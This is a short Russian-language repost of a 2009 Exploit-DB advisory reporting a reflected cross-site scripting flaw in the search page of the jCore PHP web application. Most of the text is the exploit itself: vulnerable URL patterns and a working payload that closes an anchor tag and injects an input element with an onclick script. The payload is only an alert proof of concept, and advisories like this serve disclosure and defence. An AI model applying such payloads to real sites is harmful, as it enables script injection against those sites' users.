- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 10531
- Проверка EDB
-
- Пройдено
- Автор
- LONEFERRET
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- null
- Дата публикации
- 2009-12-17
Код:
Found: loneferret
Vendor: jCore
Site: http://www.jcore.net/home
Software link: http://www.jcore.net/downloads
Search page is vulnerable to cross-site scripting.
Exploit:
http://server/modules/search?search=[xss here]
http://server/modules/search?search=</a>[xss here]
Example:
The result page will screw up. Hit the back button and you newly created
submit input type will be there. Fully functional.
http://server/modules/search?search=</a><input value="xss" onclick="alert(1)" type="submit">- Источник
- www.exploit-db.com
